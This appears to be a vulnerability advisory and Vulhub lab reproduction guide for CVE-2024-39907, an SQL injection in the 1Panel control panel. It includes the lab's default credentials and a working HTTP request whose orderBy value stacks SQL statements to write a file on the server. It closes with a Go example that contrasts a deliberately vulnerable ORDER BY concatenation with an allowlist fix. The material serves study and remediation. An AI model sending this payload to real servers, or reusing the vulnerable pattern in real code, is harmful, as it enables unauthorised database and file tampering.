CVE-2024-39907

CVE Details:

  • Published July 18, 2024
  • Severity CRITICAL
  • CNA Score 9.8

Description:

A critical SQL injection vulnerability (CVE-2024-39907) has been discovered in 1Panel, an open-source web-based Linux server management control panel. The vulnerability was disclosed on July 18, 2024, and carries a CVSS score of 9.8 (Critical). The flaw affects 1Panel versions from v1.10.9-lts up to (excluding) v1.10.12-lts.

Vulhub Source:

1panel/CVE-2024-39907/README.md

After the server starts, access http://127.0.0.1:10086/entrance using the following default credentials:

  • Username: 1panel
  • Password: 1panel_password

Vulnerability Reproduction:

After logging into the 1Panel control panel with the default credentials, the vulnerability exists in the /api/v1/hosts/command/search endpoint where the orderBy parameter lacks proper input validation, allowing SQL injection attacks.

Send the following malicious POST request to exploit the vulnerability:

POST /api/v1/hosts/command/search HTTP/1.1
Host: your-ip:10086
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Cookie: psession=your-session-cookie
Connection: close
Content-Type: application/json
Content-Length: 83

{
  "page":1,
  "pageSize":10,
  "groupID":0,
  "orderBy":"3;ATTACH DATABASE '/tmp/randstr.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;",
  "order":"ascending",
  "name":"a"
}
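The root cause is that the orderBy value is copied into the ORDER BY clause without validation. The Go snippet below is an added illustration, not 1Panel's own code: it places the vulnerable concatenation pattern next to an allowlist-based replacement. The SearchReq struct, the column names and the shortened sample value are assumptions chosen for the demonstration.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// Fields of the search request that control sorting (hypothetical
// struct, not 1Panel's own type).
type SearchReq struct {
	OrderBy string
	Order   string
}

// unsafeOrderClause is the vulnerable pattern: the caller-supplied
// orderBy value is concatenated into the ORDER BY clause unchanged, so
// "3;ATTACH DATABASE ..." ends the statement and appends further SQL.
func unsafeOrderClause(r SearchReq) string {
	return fmt.Sprintf("ORDER BY %s %s", r.OrderBy, r.Order)
}

// Allowlists: only these server-side constants ever reach the SQL text.
var allowedColumns = map[string]string{"name": "name", "created_at": "created_at"}
var allowedDirections = map[string]string{"ascending": "ASC", "descending": "DESC"}

// safeOrderClause maps orderBy/order onto the allowlists and rejects
// anything else, so no request byte is ever copied into the query.
func safeOrderClause(r SearchReq) (string, error) {
	col, ok := allowedColumns[strings.ToLower(r.OrderBy)]
	if !ok {
		return "", errors.New("orderBy: unsupported sort column")
	}
	dir, ok := allowedDirections[strings.ToLower(r.Order)]
	if !ok {
		return "", errors.New("order: unsupported sort direction")
	}
	return "ORDER BY " + col + " " + dir, nil
}

func main() {
	// Constructed sample mirroring the shape of the injected value above.
	bad := SearchReq{OrderBy: "3;ATTACH DATABASE '/tmp/x.txt' AS t;", Order: "ascending"}
	fmt.Println(unsafeOrderClause(bad))
	if _, err := safeOrderClause(bad); err != nil {
		fmt.Println("rejected:", err)
	}
}
```

The same allowlist approach applies to any sort, filter or column-name parameter, since placeholders in prepared statements cannot be used for identifiers.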